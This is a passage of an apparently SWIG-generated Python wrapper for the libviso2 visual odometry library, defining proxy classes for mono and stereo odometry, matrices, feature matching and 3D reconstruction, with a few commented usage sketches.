VO_parameters_swigregister(VO_parameters)
class VisualOdometryMono(VisualOdometry):
"""Proxy of C++ VisualOdometryMono class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryMono, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryMono, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryMono"""
this = _viso2.new_VisualOdometryMono(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryMono
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I, dims, replace=False) -> bool
process(self, I, dims) -> bool
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
"""
return _viso2.VisualOdometryMono_process(self, *args)
def getInlierMatches(self):
"""getInlierMatches(self) -> MatchVector"""
return _viso2.VisualOdometryMono_getInlierMatches(self)
def process_frame(self, *args):
"""
process_frame(self, image1, replace=False) -> bool
process_frame(self, image1) -> bool
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryMono_process_frame(self, *args)
VisualOdometryMono_swigregister = _viso2.VisualOdometryMono_swigregister
VisualOdometryMono_swigregister(VisualOdometryMono)
class Mono_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryMono::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Mono_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Mono_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["height"] = _viso2.Mono_parameters_height_set
__swig_getmethods__["height"] = _viso2.Mono_parameters_height_get
if _newclass:
height = _swig_property(_viso2.Mono_parameters_height_get, _viso2.Mono_parameters_height_set)
__swig_setmethods__["pitch"] = _viso2.Mono_parameters_pitch_set
__swig_getmethods__["pitch"] = _viso2.Mono_parameters_pitch_get
if _newclass:
pitch = _swig_property(_viso2.Mono_parameters_pitch_get, _viso2.Mono_parameters_pitch_set)
__swig_setmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Mono_parameters_ransac_iters_get, _viso2.Mono_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Mono_parameters_inlier_threshold_get, _viso2.Mono_parameters_inlier_threshold_set)
__swig_setmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_set
__swig_getmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_get
if _newclass:
motion_threshold = _swig_property(_viso2.Mono_parameters_motion_threshold_get, _viso2.Mono_parameters_motion_threshold_set)
def __init__(self):
"""__init__(self) -> Mono_parameters"""
this = _viso2.new_Mono_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Mono_parameters
__del__ = lambda self: None
Mono_parameters_swigregister = _viso2.Mono_parameters_swigregister
Mono_parameters_swigregister(Mono_parameters)
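# A minimal usage sketch (not part of the generated wrapper), assuming a greyscale uint8
# numpy frame `img` and example calibration / mounting values:
#
#   mono_params = Mono_parameters()
#   mono_params.calib.f, mono_params.calib.cu, mono_params.calib.cv = 721.5, 609.6, 172.9
#   mono_params.height, mono_params.pitch = 1.65, -0.08
#   viso = VisualOdometryMono(mono_params)
#   if viso.process_frame(img):
#       pose_delta = viso.getMotion()      # frame-to-frame motion as a Matrix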
class VisualOdometryStereo(VisualOdometry):
"""Proxy of C++ VisualOdometryStereo class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryStereo, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryStereo, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryStereo"""
this = _viso2.new_VisualOdometryStereo(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryStereo
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
process(self, p_matched_) -> bool
"""
return _viso2.VisualOdometryStereo_process(self, *args)
def process_frame(self, image1, image2, replace=False):
"""
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryStereo_process_frame(self, image1, image2, replace)
VisualOdometryStereo_swigregister = _viso2.VisualOdometryStereo_swigregister
VisualOdometryStereo_swigregister(VisualOdometryStereo)
class Stereo_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryStereo::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Stereo_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Stereo_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["base"] = _viso2.Stereo_parameters_base_set
__swig_getmethods__["base"] = _viso2.Stereo_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Stereo_parameters_base_get, _viso2.Stereo_parameters_base_set)
__swig_setmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Stereo_parameters_ransac_iters_get, _viso2.Stereo_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Stereo_parameters_inlier_threshold_get, _viso2.Stereo_parameters_inlier_threshold_set)
__swig_setmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_set
__swig_getmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_get
if _newclass:
reweighting = _swig_property(_viso2.Stereo_parameters_reweighting_get, _viso2.Stereo_parameters_reweighting_set)
def __init__(self):
"""__init__(self) -> Stereo_parameters"""
this = _viso2.new_Stereo_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Stereo_parameters
__del__ = lambda self: None
Stereo_parameters_swigregister = _viso2.Stereo_parameters_swigregister
Stereo_parameters_swigregister(Stereo_parameters)
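# A minimal usage sketch (not part of the generated wrapper), assuming rectified greyscale
# uint8 numpy frames `left` and `right` and example calibration values:
#
#   stereo_params = Stereo_parameters()
#   stereo_params.calib.f, stereo_params.calib.cu, stereo_params.calib.cv = 721.5, 609.6, 172.9
#   stereo_params.base = 0.54                  # stereo baseline in metres
#   viso = VisualOdometryStereo(stereo_params)
#   if viso.process_frame(left, right):
#       pose_delta = viso.getMotion()          # 4x4 homogeneous transform (Matrix)
#       num_inliers = viso.getNumberOfInliers()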
class Matrix(_object):
"""Proxy of C++ Matrix class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matrix, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matrix, name)
__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Matrix
__init__(self, m, n) -> Matrix
__init__(self, m, n, val_) -> Matrix
__init__(self, M) -> Matrix
"""
this = _viso2.new_Matrix(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matrix
__del__ = lambda self: None
def assign(self, M):
"""assign(self, M) -> Matrix"""
return _viso2.Matrix_assign(self, M)
def getData(self, val_, i1=0, j1=0, i2=-1, j2=-1):
"""
getData(self, val_, i1=0, j1=0, i2=-1, j2=-1)
getData(self, val_, i1=0, j1=0, i2=-1)
getData(self, val_, i1=0, j1=0)
getData(self, val_, i1=0)
getData(self, val_)
"""
return _viso2.Matrix_getData(self, val_, i1, j1, i2, j2)
def getMat(self, i1, j1, i2=-1, j2=-1):
"""
getMat(self, i1, j1, i2=-1, j2=-1) -> Matrix
getMat(self, i1, j1, i2=-1) -> Matrix
getMat(self, i1, j1) -> Matrix
"""
return _viso2.Matrix_getMat(self, i1, j1, i2, j2)
def setMat(self, M, i, j):
"""setMat(self, M, i, j)"""
return _viso2.Matrix_setMat(self, M, i, j)
def setVal(self, s, i1=0, j1=0, i2=-1, j2=-1):
"""
setVal(self, s, i1=0, j1=0, i2=-1, j2=-1)
setVal(self, s, i1=0, j1=0, i2=-1)
setVal(self, s, i1=0, j1=0)
setVal(self, s, i1=0)
setVal(self, s)
"""
return _viso2.Matrix_setVal(self, s, i1, j1, i2, j2)
def setDiag(self, s, i1=0, i2=-1):
"""
setDiag(self, s, i1=0, i2=-1)
setDiag(self, s, i1=0)
setDiag(self, s)
"""
return _viso2.Matrix_setDiag(self, s, i1, i2)
def zero(self):
"""zero(self)"""
return _viso2.Matrix_zero(self)
def extractCols(self, idx):
"""extractCols(self, idx) -> Matrix"""
return _viso2.Matrix_extractCols(self, idx)
def eye(m):
"""eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
eye = staticmethod(eye)
def identity(self):
"""identity(self)"""
return _viso2.Matrix_identity(self)
def diag(M):
"""diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
diag = staticmethod(diag)
def reshape(M, m, n):
"""reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
reshape = staticmethod(reshape)
def rotMatX(angle):
"""rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
rotMatX = staticmethod(rotMatX)
def rotMatY(angle):
"""rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
rotMatY = staticmethod(rotMatY)
def rotMatZ(angle):
"""rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
rotMatZ = staticmethod(rotMatZ)
def __add__(self, M):
"""__add__(self, M) -> Matrix"""
return _viso2.Matrix___add__(self, M)
def __sub__(self, M):
"""__sub__(self, M) -> Matrix"""
return _viso2.Matrix___sub__(self, M)
def __mul__(self, *args):
"""
__mul__(self, M) -> Matrix
__mul__(self, s) -> Matrix
"""
return _viso2.Matrix___mul__(self, *args)
def __truediv__(self, *args):
return _viso2.Matrix___truediv__(self, *args)
__div__ = __truediv__
def __neg__(self):
"""__neg__(self) -> Matrix"""
return _viso2.Matrix___neg__(self)
def __invert__(self):
"""__invert__(self) -> Matrix"""
return _viso2.Matrix___invert__(self)
def l2norm(self):
"""l2norm(self) -> FLOAT"""
return _viso2.Matrix_l2norm(self)
def mean(self):
"""mean(self) -> FLOAT"""
return _viso2.Matrix_mean(self)
def cross(a, b):
"""cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
cross = staticmethod(cross)
def inv(M):
"""inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
inv = staticmethod(inv)
def setInverse(self):
"""setInverse(self) -> bool"""
return _viso2.Matrix_setInverse(self)
def det(self):
"""det(self) -> FLOAT"""
return _viso2.Matrix_det(self)
def solve(self, M, eps=1e-20):
"""
solve(self, M, eps=1e-20) -> bool
solve(self, M) -> bool
"""
return _viso2.Matrix_solve(self, M, eps)
def lu(self, idx, d, eps=1e-20):
"""
lu(self, idx, d, eps=1e-20) -> bool
lu(self, idx, d) -> bool
"""
return _viso2.Matrix_lu(self, idx, d, eps)
def svd(self, U, W, V):
"""svd(self, U, W, V)"""
return _viso2.Matrix_svd(self, U, W, V)
__swig_setmethods__["val"] = _viso2.Matrix_val_set
__swig_getmethods__["val"] = _viso2.Matrix_val_get
if _newclass:
val = _swig_property(_viso2.Matrix_val_get, _viso2.Matrix_val_set)
__swig_setmethods__["m"] = _viso2.Matrix_m_set
__swig_getmethods__["m"] = _viso2.Matrix_m_get
if _newclass:
m = _swig_property(_viso2.Matrix_m_get, _viso2.Matrix_m_set)
__swig_setmethods__["n"] = _viso2.Matrix_n_set
__swig_getmethods__["n"] = _viso2.Matrix_n_get
if _newclass:
n = _swig_property(_viso2.Matrix_n_get, _viso2.Matrix_n_set)
def __str__(self):
"""__str__(self) -> std::string"""
return _viso2.Matrix___str__(self)
def toNumpy(self, mat):
"""toNumpy(self, mat)"""
return _viso2.Matrix_toNumpy(self, mat)
Matrix_swigregister = _viso2.Matrix_swigregister
Matrix_swigregister(Matrix)
def Matrix_eye(m):
"""Matrix_eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
def Matrix_diag(M):
"""Matrix_diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
def Matrix_reshape(M, m, n):
"""Matrix_reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
def Matrix_rotMatX(angle):
"""Matrix_rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
def Matrix_rotMatY(angle):
"""Matrix_rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
def Matrix_rotMatZ(angle):
"""Matrix_rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
def Matrix_cross(a, b):
"""Matrix_cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
def Matrix_inv(M):
"""Matrix_inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
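# A small illustrative sketch (not part of the generated wrapper) of the Matrix helpers
# declared above; toNumpy is assumed here to fill the supplied numpy array in place:
#
#   import numpy as np
#   R = Matrix_rotMatZ(0.1)                    # rotation about the Z axis
#   arr = np.zeros((R.m, R.n))
#   R.toNumpy(arr)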
class Matcher(_object):
"""Proxy of C++ Matcher class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> Matcher"""
this = _viso2.new_Matcher(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher
__del__ = lambda self: None
def setIntrinsics(self, f, cu, cv, base):
"""setIntrinsics(self, f, cu, cv, base)"""
return _viso2.Matcher_setIntrinsics(self, f, cu, cv, base)
def matchFeatures(self, method, Tr_delta=None):
"""
matchFeatures(self, method, Tr_delta=None)
matchFeatures(self, method)
"""
return _viso2.Matcher_matchFeatures(self, method, Tr_delta)
def bucketFeatures(self, max_features, bucket_width, bucket_height):
"""bucketFeatures(self, max_features, bucket_width, bucket_height)"""
return _viso2.Matcher_bucketFeatures(self, max_features, bucket_width, bucket_height)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.Matcher_getMatches(self)
def getGain(self, inliers):
"""getGain(self, inliers) -> float"""
return _viso2.Matcher_getGain(self, inliers)
def pushBack(self, *args):
"""
pushBack(self, I1, I2, dims, replace)
pushBack(self, I1, dims, replace)
pushBack(self, image1, image2, replace=False)
pushBack(self, image1, image2)
pushBack(self, image1, replace=False)
pushBack(self, image1)
"""
return _viso2.Matcher_pushBack(self, *args)
Matcher_swigregister = _viso2.Matcher_swigregister
Matcher_swigregister(Matcher)
class Matcher_parameters(_object):
"""Proxy of C++ Matcher::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_set
__swig_getmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_get
if _newclass:
nms_n = _swig_property(_viso2.Matcher_parameters_nms_n_get, _viso2.Matcher_parameters_nms_n_set)
__swig_setmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_set
__swig_getmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_get
if _newclass:
nms_tau = _swig_property(_viso2.Matcher_parameters_nms_tau_get, _viso2.Matcher_parameters_nms_tau_set)
__swig_setmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_set
__swig_getmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_get
if _newclass:
match_binsize = _swig_property(_viso2.Matcher_parameters_match_binsize_get, _viso2.Matcher_parameters_match_binsize_set)
__swig_setmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_set
__swig_getmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_get
if _newclass:
match_radius = _swig_property(_viso2.Matcher_parameters_match_radius_get, _viso2.Matcher_parameters_match_radius_set)
__swig_setmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_set
__swig_getmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_get
if _newclass:
match_disp_tolerance = _swig_property(_viso2.Matcher_parameters_match_disp_tolerance_get, _viso2.Matcher_parameters_match_disp_tolerance_set)
__swig_setmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_set
__swig_getmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_get
if _newclass:
outlier_disp_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_disp_tolerance_get, _viso2.Matcher_parameters_outlier_disp_tolerance_set)
__swig_setmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_set
__swig_getmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_get
if _newclass:
outlier_flow_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_flow_tolerance_get, _viso2.Matcher_parameters_outlier_flow_tolerance_set)
__swig_setmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_set
__swig_getmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_get
if _newclass:
multi_stage = _swig_property(_viso2.Matcher_parameters_multi_stage_get, _viso2.Matcher_parameters_multi_stage_set)
__swig_setmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_set
__swig_getmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_get
if _newclass:
half_resolution = _swig_property(_viso2.Matcher_parameters_half_resolution_get, _viso2.Matcher_parameters_half_resolution_set)
__swig_setmethods__["refinement"] = _viso2.Matcher_parameters_refinement_set
__swig_getmethods__["refinement"] = _viso2.Matcher_parameters_refinement_get
if _newclass:
refinement = _swig_property(_viso2.Matcher_parameters_refinement_get, _viso2.Matcher_parameters_refinement_set)
__swig_setmethods__["f"] = _viso2.Matcher_parameters_f_set
__swig_getmethods__["f"] = _viso2.Matcher_parameters_f_get
if _newclass:
f = _swig_property(_viso2.Matcher_parameters_f_get, _viso2.Matcher_parameters_f_set)
__swig_setmethods__["cu"] = _viso2.Matcher_parameters_cu_set
__swig_getmethods__["cu"] = _viso2.Matcher_parameters_cu_get
if _newclass:
cu = _swig_property(_viso2.Matcher_parameters_cu_get, _viso2.Matcher_parameters_cu_set)
__swig_setmethods__["cv"] = _viso2.Matcher_parameters_cv_set
__swig_getmethods__["cv"] = _viso2.Matcher_parameters_cv_get
if _newclass:
cv = _swig_property(_viso2.Matcher_parameters_cv_get, _viso2.Matcher_parameters_cv_set)
__swig_setmethods__["base"] = _viso2.Matcher_parameters_base_set
__swig_getmethods__["base"] = _viso2.Matcher_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Matcher_parameters_base_get, _viso2.Matcher_parameters_base_set)
def __init__(self):
"""__init__(self) -> Matcher_parameters"""
this = _viso2.new_Matcher_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher_parameters
__del__ = lambda self: None
Matcher_parameters_swigregister = _viso2.Matcher_parameters_swigregister
Matcher_parameters_swigregister(Matcher_parameters)
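# A minimal usage sketch (not part of the generated wrapper), assuming consecutive greyscale
# uint8 numpy frames `img_prev` and `img_cur` from a single moving camera:
#
#   m_params = Matcher_parameters()
#   matcher = Matcher(m_params)
#   matcher.pushBack(img_prev)
#   matcher.pushBack(img_cur)
#   matcher.matchFeatures(0)                   # method 0 is monocular flow matching in libviso2
#   matches = matcher.getMatches()             # MatchVector of p_match entries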
class p_match(_object):
"""Proxy of C++ Matcher::p_match class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, p_match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, p_match, name)
__repr__ = _swig_repr
__swig_setmethods__["u1p"] = _viso2.p_match_u1p_set
__swig_getmethods__["u1p"] = _viso2.p_match_u1p_get
if _newclass:
u1p = _swig_property(_viso2.p_match_u1p_get, _viso2.p_match_u1p_set)
__swig_setmethods__["v1p"] = _viso2.p_match_v1p_set
__swig_getmethods__["v1p"] = _viso2.p_match_v1p_get
if _newclass:
v1p = _swig_property(_viso2.p_match_v1p_get, _viso2.p_match_v1p_set)
__swig_setmethods__["i1p"] = _viso2.p_match_i1p_set
__swig_getmethods__["i1p"] = _viso2.p_match_i1p_get
if _newclass:
i1p = _swig_property(_viso2.p_match_i1p_get, _viso2.p_match_i1p_set)
__swig_setmethods__["u2p"] = _viso2.p_match_u2p_set
__swig_getmethods__["u2p"] = _viso2.p_match_u2p_get
if _newclass:
u2p = _swig_property(_viso2.p_match_u2p_get, _viso2.p_match_u2p_set)
__swig_setmethods__["v2p"] = _viso2.p_match_v2p_set
__swig_getmethods__["v2p"] = _viso2.p_match_v2p_get
if _newclass:
v2p = _swig_property(_viso2.p_match_v2p_get, _viso2.p_match_v2p_set)
__swig_setmethods__["i2p"] = _viso2.p_match_i2p_set
__swig_getmethods__["i2p"] = _viso2.p_match_i2p_get
if _newclass:
i2p = _swig_property(_viso2.p_match_i2p_get, _viso2.p_match_i2p_set)
__swig_setmethods__["u1c"] = _viso2.p_match_u1c_set
__swig_getmethods__["u1c"] = _viso2.p_match_u1c_get
if _newclass:
u1c = _swig_property(_viso2.p_match_u1c_get, _viso2.p_match_u1c_set)
__swig_setmethods__["v1c"] = _viso2.p_match_v1c_set
__swig_getmethods__["v1c"] = _viso2.p_match_v1c_get
if _newclass:
v1c = _swig_property(_viso2.p_match_v1c_get, _viso2.p_match_v1c_set)
__swig_setmethods__["i1c"] = _viso2.p_match_i1c_set
__swig_getmethods__["i1c"] = _viso2.p_match_i1c_get
if _newclass:
i1c = _swig_property(_viso2.p_match_i1c_get, _viso2.p_match_i1c_set)
__swig_setmethods__["u2c"] = _viso2.p_match_u2c_set
__swig_getmethods__["u2c"] = _viso2.p_match_u2c_get
if _newclass:
u2c = _swig_property(_viso2.p_match_u2c_get, _viso2.p_match_u2c_set)
__swig_setmethods__["v2c"] = _viso2.p_match_v2c_set
__swig_getmethods__["v2c"] = _viso2.p_match_v2c_get
if _newclass:
v2c = _swig_property(_viso2.p_match_v2c_get, _viso2.p_match_v2c_set)
__swig_setmethods__["i2c"] = _viso2.p_match_i2c_set
__swig_getmethods__["i2c"] = _viso2.p_match_i2c_get
if _newclass:
i2c = _swig_property(_viso2.p_match_i2c_get, _viso2.p_match_i2c_set)
def __init__(self, *args):
"""
__init__(self) -> p_match
__init__(self, u1p, v1p, i1p, u2p, v2p, i2p, u1c, v1c, i1c, u2c, v2c, i2c) -> p_match
"""
this = _viso2.new_p_match(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_p_match
__del__ = lambda self: None
p_match_swigregister = _viso2.p_match_swigregister
p_match_swigregister(p_match)
class Reconstruction(_object):
"""Proxy of C++ Reconstruction class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Reconstruction, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Reconstruction, name)
__repr__ = _swig_repr
def __init__(self):
"""__init__(self) -> Reconstruction"""
this = _viso2.new_Reconstruction()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Reconstruction
__del__ = lambda self: None
def setCalibration(self, f, cu, cv):
"""setCalibration(self, f, cu, cv)"""
return _viso2.Reconstruction_setCalibration(self, f, cu, cv)
def update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2):
"""
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2)
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30)
update(self, p_matched, Tr, point_type=1, min_track_length=2)
update(self, p_matched, Tr, point_type=1)
update(self, p_matched, Tr)
"""
return _viso2.Reconstruction_update(self, p_matched, Tr, point_type, min_track_length, max_dist, min_angle)
def getPoints(self):
"""getPoints(self) -> Point3dVector"""
return _viso2.Reconstruction_getPoints(self)
def getTracks(self):
"""getTracks(self) -> TrackVector"""
return _viso2.Reconstruction_getTracks(self)
Reconstruction_swigregister = _viso2.Reconstruction_swigregister
Reconstruction_swigregister(Reconstruction)
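# A minimal usage sketch (not part of the generated wrapper), assuming `matches` and the
# frame-to-frame pose `pose_delta` come from a Matcher / VisualOdometry run as sketched above:
#
#   recon = Reconstruction()
#   recon.setCalibration(721.5, 609.6, 172.9)
#   recon.update(matches, pose_delta)
#   points = recon.getPoints()                 # Point3dVector of reconstructed 3D points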
class point3d(_object):
"""Proxy of C++ Reconstruction::point3d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point3d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point3d, name)
__repr__ = _swig_repr
__swig_setmethods__["x"] = _viso2.point3d_x_set
__swig_getmethods__["x"] = _viso2.point3d_x_get
if _newclass:
x = _swig_property(_viso2.point3d_x_get, _viso2.point3d_x_set)
__swig_setmethods__["y"] = _viso2.point3d_y_set
__swig_getmethods__["y"] = _viso2.point3d_y_get
if _newclass:
y = _swig_property(_viso2.point3d_y_get, _viso2.point3d_y_set)
__swig_setmethods__["z"] = _viso2.point3d_z_set
__swig_getmethods__["z"] = _viso2.point3d_z_get
if _newclass:
z = _swig_property(_viso2.point3d_z_get, _viso2.point3d_z_set)
def __init__(self, *args):
"""
__init__(self) -> point3d
__init__(self, x, y, z) -> point3d
"""
this = _viso2.new_point3d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point3d
__del__ = lambda self: None
point3d_swigregister = _viso2.point3d_swigregister
point3d_swigregister(point3d)
class point2d(_object):
"""Proxy of C++ Reconstruction::point2d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point2d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point2d, name)
__repr__ = _swig_repr
__swig_setmethods__["u"] = _viso2.point2d_u_set
__swig_getmethods__["u"] = _viso2.point2d_u_get
if _newclass:
u = _swig_property(_viso2.point2d_u_get, _viso2.point2d_u_set)
__swig_setmethods__["v"] = _viso2.point2d_v_set
__swig_getmethods__["v"] = _viso2.point2d_v_get
if _newclass:
v = _swig_property(_viso2.point2d_v_get, _viso2.point2d_v_set)
def __init__(self, *args):
"""
__init__(self) -> point2d
__init__(self, u, v) -> point2d
"""
this = _viso2.new_point2d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point2d
__del__ = lambda self: None
point2d_swigregister = _viso2.point2d_swigregister
point2d_swigregister(point2d)
class track(_object):
"""Proxy of C++ Reconstruction::track class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, track, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, track, name)
__repr__ = _swig_repr
__swig_setmethods__["pixels"] = _viso2.track_pixels_set
__swig_getmethods__["pixels"] = _viso2.track_pixels_get
if _newclass:
pixels = _swig_property(_viso2.track_pixels_get, _viso2.track_pixels_set)
__swig_setmethods__["pt"] = _viso2.track_pt_set
__swig_getmethods__["pt"] = _viso2.track_pt_get
if _newclass:
pt = _swig_property(_viso2.track_pt_get, _viso2.track_pt_set)
__swig_setmethods__["valid"] = _viso2.track_valid_set
__swig_getmethods__["valid"] = _viso2.track_valid_get
if _newclass:
valid = _swig_property(_viso2.track_valid_get, _viso2.track_valid_set)
__swig_setmethods__["first_frame"] = _viso2.track_first_frame_set
__swig_getmethods__["first_frame"] = _viso2.track_first_frame_get
if _newclass:
first_frame = _swig_property(_viso2.track_first_frame_get, _viso2.track_first_frame_set)
__swig_setmethods__["last_frame"] = _viso2.track_last_frame_set
__swig_getmethods__["last_frame"] = _viso2.track_last_frame_get
if _newclass:
last_frame = _swig_property(_viso2.track_last_frame_get, _viso2.track_last_frame_set)
__swig_setmethods__["last_idx"] = _viso2.track_last_idx_set
__swig_getmethods__["last_idx"] = _viso2.track_last_idx_get
if _newclass:
